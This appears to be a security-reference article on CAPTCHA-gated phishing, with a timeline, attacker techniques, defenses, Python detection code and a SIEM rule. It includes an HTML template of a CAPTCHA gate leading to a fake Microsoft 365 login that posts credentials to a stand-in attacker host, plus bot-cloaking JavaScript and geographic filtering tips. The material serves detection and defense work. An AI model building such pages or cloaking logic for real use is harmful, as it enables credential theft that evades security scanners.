CAPTCHA-Gated Phishing

Attackers place CAPTCHAs before phishing pages to block automated security scanners while allowing human victims through.

MITRE ATT&CK: T1566.002

Timeline: The Cat and Mouse

2019 ← Attack emerges → 2021 ← Defenses adapt → 2023 ← Multi-stage gates → Present

The Evolution

Phase      | Period    | What Happened
-----------|-----------|----------------------------------------------------------------
ATTACK     | 2019      | CAPTCHAs placed before phishing pages block automated scanning
PEAK       | 2020-2022 | reCAPTCHA, hCaptcha abuse becomes widespread
RESPONSE   | 2021      | Some scanners can solve simple CAPTCHAs
           | 2022      | CAPTCHA presence flagged as suspicious indicator
           | 2023      | Advanced scanners use headless browsers with CAPTCHA solving
ADAPTATION | 2023+     | Multi-stage CAPTCHAs, Cloudflare Turnstile abuse, JS challenges
CURRENT    | Present   | Effective against basic scanning; advanced detection improving

Key Events with Sources

Date | Event                      | Significance                                           | Source
-----|----------------------------|--------------------------------------------------------|------------------
2019 | CAPTCHA gating emerges     | Attackers discover CAPTCHAs block URL scanners         | Cofense
2020 | reCAPTCHA abuse peaks      | Free Google service weaponized for phishing protection | Abnormal Security
2021 | CAPTCHA-aware scanning     | Security vendors develop CAPTCHA detection/solving     | Proofpoint
2022 | Cloudflare Turnstile abuse | Newer "frictionless" CAPTCHA exploited                 | Cloudflare
2023 | Multi-stage gates          | Multiple CAPTCHAs + JS challenges in sequence          | Sublime Security

Overview

Automated security tools scan URLs in emails to detect phishing. Attackers counter by placing CAPTCHAs (Completely Automated Public Turing test to tell Computers and Humans Apart) in front of phishing pages. Automated scanners hit the CAPTCHA and see nothing malicious. Human victims solve the CAPTCHA and reach the phishing page.

The Attack

How It Works

┌─────────────────────────────────────────────────────────┐
│  AUTOMATED SCANNER                                      │
│                                                         │
│  Scanning: https://phishing.com/login                   │
│  Result: CAPTCHA page                                   │
│  Content: "Please verify you're human"                  │
│  Malicious indicators: NONE                             │
│  Verdict: CLEAN ✓                                       │
└─────────────────────────────────────────────────────────┘

┌─────────────────────────────────────────────────────────┐
│  HUMAN VICTIM                                           │
│                                                         │
│  Clicks link → CAPTCHA page                             │
│  Solves CAPTCHA → Phishing page                         │
│  Enters credentials → Compromised                       │
└─────────────────────────────────────────────────────────┘

Technical Implementation

Using reCAPTCHA:

<!-- Page 1: CAPTCHA Gate -->
<html>
<head>
    <script src="https://www.google.com/recaptcha/api.js"></script>
</head>
<body>
    <h1>Security Verification Required</h1>
    <form action="/verify" method="POST">
        <div class="g-recaptcha" data-sitekey="[KEY]"></div>
        <button type="submit">Continue</button>
    </form>
</body>
</html>

<!-- Page 2: Phishing Page (after CAPTCHA solved) -->
<html>
<body>
    <h1>Microsoft 365 Login</h1>
    <form action="https://attacker.com/harvest">
        <input name="email" placeholder="Email">
        <input name="password" type="password" placeholder="Password">
        <button>Sign In</button>
    </form>
</body>
</html>

CAPTCHA Services Abused

Google reCAPTCHA:

  • Most common, trusted by users
  • Free to deploy
  • Checkbox or invisible versions

hCaptcha:

  • reCAPTCHA alternative
  • Also easily deployable
  • Image selection challenges

Cloudflare Turnstile:

  • Newer, "frictionless"
  • Attackers abuse Cloudflare protection

Custom CAPTCHAs:

  • Simple math problems
  • Image selection
  • Harder for automation

Why It Works

Looks Legitimate:

  • CAPTCHAs are everywhere
  • Users expect security checks
  • Google/Cloudflare branding = trust

Defeats Automation:

  • Scanners can’t solve CAPTCHAs
  • Sandbox analysis blocked
  • URL reputation tools see only CAPTCHA

Timing Advantage:

  • Even if eventually flagged
  • Attack works during initial window
  • Manual review takes time

Common Lures

Microsoft 365:

Subject: Document Shared With You
Link: View Document β†’ CAPTCHA β†’ Fake O365 login

Voicemail:

Subject: New Voicemail Message
Link: Listen β†’ CAPTCHA β†’ Credential harvester

Package Delivery:

Subject: Delivery Attempt Failed
Link: Reschedule β†’ CAPTCHA β†’ Phishing page

Defenses

Advanced URL Scanning

Some security tools can:

  • Detect CAPTCHA presence (suspicious indicator)
  • Use CAPTCHA-solving services
  • Employ headless browsers with human simulation
  • Flag CAPTCHA + credential form combination

Behavioral Analysis

Look for patterns:

  • CAPTCHA on non-login pages (suspicious)
  • CAPTCHA leading to credential harvesting
  • Recently registered domain + CAPTCHA
  • Cloudflare-protected page + login form

URL Reputation

Flag URLs that:

  • Use free CAPTCHA services
  • Have CAPTCHA on landing page
  • Redirect to credential forms after CAPTCHA
  • Are newly registered

User Training

Train users to recognize:

  • Unexpected CAPTCHAs before login
  • CAPTCHAs on unofficial domains
  • Security verification for routine tasks
  • Suspicious URL destinations

Attacker Adaptation

Multi-Stage Gates

CAPTCHA 1 (reCAPTCHA)
    ↓
CAPTCHA 2 (hCaptcha)
    ↓
Human Verification Question
    ↓
Phishing Page

Each layer increases automation difficulty.

JavaScript Challenges

// Check for human-like behavior
if (mouseMovements < 10 || loadTime < 500) {
    // Likely bot - show nothing
    redirect("/404");
} else {
    // Likely human - show phishing
    showPhishingPage();
}

Session-Based Gating

First visit: CAPTCHA
Session stored: PASSED=true
Subsequent visits: Direct to phishing

Scanner revisits: CAPTCHA again
Same session required: Defeats repeat scanning

Geographic Filtering

If visitor IP in target region: Show phishing
Else: Show benign content or CAPTCHA

Security scanners often run from IP ranges in specific regions, so filtering by visitor region can hide the phishing page from them while still serving it to targets.

Current State

Status: Active

CAPTCHA gating remains effective:

Why It Works             | Defensive Progress
-------------------------|--------------------------
Defeats simple scanning  | Advanced scanners adapt
Uses legitimate services | Hard to block reCAPTCHA
Users expect CAPTCHAs    | Awareness training helps
Easy to implement        | Detection improving

Detection Guidance

URL Analysis

Flag URLs with:

  • CAPTCHA on landing page
  • Redirect after CAPTCHA
  • Credential forms post-CAPTCHA
  • Recently registered + CAPTCHA
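The page-level checks listed under Defenses and in the URL Analysis checklist above can be run by a scanner over the HTML it fetched. The following is an added example, not code from the original page: it detects the CAPTCHA services named here (by the providers' script hosts and widget class names), and, when the scanner also obtained the page served after the gate, flags a credential form there and a form that posts to a host other than the page's own. The sample HTML is constructed from the two pages shown earlier; the hostnames in it are placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Script hosts and widget classes of the CAPTCHA services named on this page.
CAPTCHA_HOSTS = {"www.google.com": "recaptcha", "www.recaptcha.net": "recaptcha",
                 "js.hcaptcha.com": "hcaptcha", "challenges.cloudflare.com": "turnstile"}
CAPTCHA_CLASSES = {"g-recaptcha": "recaptcha", "h-captcha": "hcaptcha", "cf-turnstile": "turnstile"}


class PageScan(HTMLParser):
    """Collect CAPTCHA widgets, password inputs and form targets from one HTML document."""
    def __init__(self, html):
        super().__init__()
        self.captchas, self.password_inputs, self.form_actions = set(), 0, []
        self.feed(html)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script" and a.get("src"):          # provider script such as recaptcha/api.js
            host = urlparse(a["src"]).hostname or ""
            if host in CAPTCHA_HOSTS:
                self.captchas.add(CAPTCHA_HOSTS[host])
        for cls in (a.get("class") or "").split():    # provider widget container
            if cls in CAPTCHA_CLASSES:
                self.captchas.add(CAPTCHA_CLASSES[cls])
        if tag == "input" and (a.get("type") or "text").lower() == "password":
            self.password_inputs += 1
        if tag == "form":
            self.form_actions.append(a.get("action") or "")


def gate_indicators(page_url, landing_html, post_gate_html=None):
    """Indicator names for the landing page and, when the scanner got past the gate, the next page."""
    page_host = urlparse(page_url).hostname or ""
    landing, found = PageScan(landing_html), set()
    if landing.captchas:
        found.add("captcha_on_landing")
    if post_gate_html is not None and landing.captchas:
        after = PageScan(post_gate_html)
        if after.password_inputs:
            found.add("credential_form_after_captcha")
        for action in after.form_actions:              # harvester posting to a different host
            host = urlparse(action).hostname
            if host and host != page_host:
                found.add("form_posts_offsite")
    return found


# Constructed samples modelled on the two pages shown earlier (hostnames are placeholders).
GATE_HTML = ('<html><head><script src="https://www.google.com/recaptcha/api.js"></script></head><body>'
             '<form action="/verify" method="POST"><div class="g-recaptcha" data-sitekey="[KEY]"></div></form></body></html>')
HARVEST_HTML = ('<html><body><h1>Microsoft 365 Login</h1><form action="https://attacker.example/harvest">'
                '<input name="email"><input name="password" type="password"></form></body></html>')
```

A landing page that carries no CAPTCHA yields no indicators even if a password field follows, so this logic complements rather than replaces ordinary credential-form detection.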

Email Context

Suspicious when:

  • Unexpected sender + CAPTCHA link
  • Urgent theme + verification required
  • Known brand + unknown domain

Post-Incident

If user reports:

  • What was behind the CAPTCHA?
  • Were credentials entered?
  • Check for account compromise
  • Block the domain

SIEM Queries

email.links.destination.has_captcha = true
AND email.sender.domain NOT IN (trusted_domains)
AND email.links.destination.domain.age_days < 30
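The pseudo-query above translates into an ordinary rule once email-link events are normalised. The following is an added example, not code from the original page: it evaluates the three conditions on constructed events (placeholder domains and dates), computes domain age from a registrar creation date, and matches trusted senders by registrable suffix so that a look-alike such as contoso.example.evil.test is not treated as the trusted contoso.example. The field names and the TRUSTED_DOMAINS allow-list are assumptions for the example.

```python
from datetime import date

# Placeholder allow-list; a deployment uses the organisation's own trusted sender domains.
TRUSTED_DOMAINS = {"contoso.example", "fabrikam.example"}


def is_trusted_sender(domain, trusted=TRUSTED_DOMAINS):
    """Exact or subdomain match: mail.contoso.example is trusted, contoso.example.evil.test is not."""
    d = domain.lower().rstrip(".")
    return any(d == t or d.endswith("." + t) for t in trusted)


def domain_age_days(registered, today):
    """Days since the registrar creation date (ISO string), or None when WHOIS data is missing."""
    return (today - date.fromisoformat(registered)).days if registered else None


def matches_captcha_rule(event, today, max_age_days=30):
    """The three conditions of the SIEM query above, evaluated on one normalised email-link event."""
    if not event.get("link_has_captcha"):
        return False
    if is_trusted_sender(event["sender_domain"]):
        return False
    age = domain_age_days(event.get("link_domain_registered"), today)
    # As with the query's "< 30", an unknown age does not match; review those separately.
    return age is not None and age < max_age_days


def flag_events(events, today):
    """IDs of the events the rule matches, in input order."""
    return [e["id"] for e in events if matches_captcha_rule(e, today)]


# Constructed sample events; domains and dates are placeholders, not real indicators.
SAMPLE_EVENTS = [
    {"id": 1, "sender_domain": "mail.contoso.example", "link_has_captcha": True,
     "link_domain_registered": "2024-05-20"},   # trusted sender: ignored
    {"id": 2, "sender_domain": "contoso.example.evil.test", "link_has_captcha": True,
     "link_domain_registered": "2024-05-20"},   # look-alike sender, 12-day-old domain: flagged
    {"id": 3, "sender_domain": "partner.test", "link_has_captcha": True,
     "link_domain_registered": "2019-01-01"},   # long-registered domain: not flagged
    {"id": 4, "sender_domain": "partner.test", "link_has_captcha": False,
     "link_domain_registered": "2024-05-20"},   # no CAPTCHA gate: not flagged
    {"id": 5, "sender_domain": "partner.test", "link_has_captcha": True,
     "link_domain_registered": None},           # registration date unknown: not matched
]
SCAN_DATE = date(2024, 6, 1)   # fixed "today" so the example is reproducible
```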

What Killed It (or Weakened It)

Defense                | Introduced | Impact
-----------------------|------------|-------------------------------------------------------------
CAPTCHA-Aware Scanning | 2021       | Some scanners can solve simple CAPTCHAs
Page Behavior Analysis | 2022       | Detect CAPTCHA presence as suspicious indicator
Post-CAPTCHA Crawling  | 2023       | Advanced scanners use headless browsers with CAPTCHA solving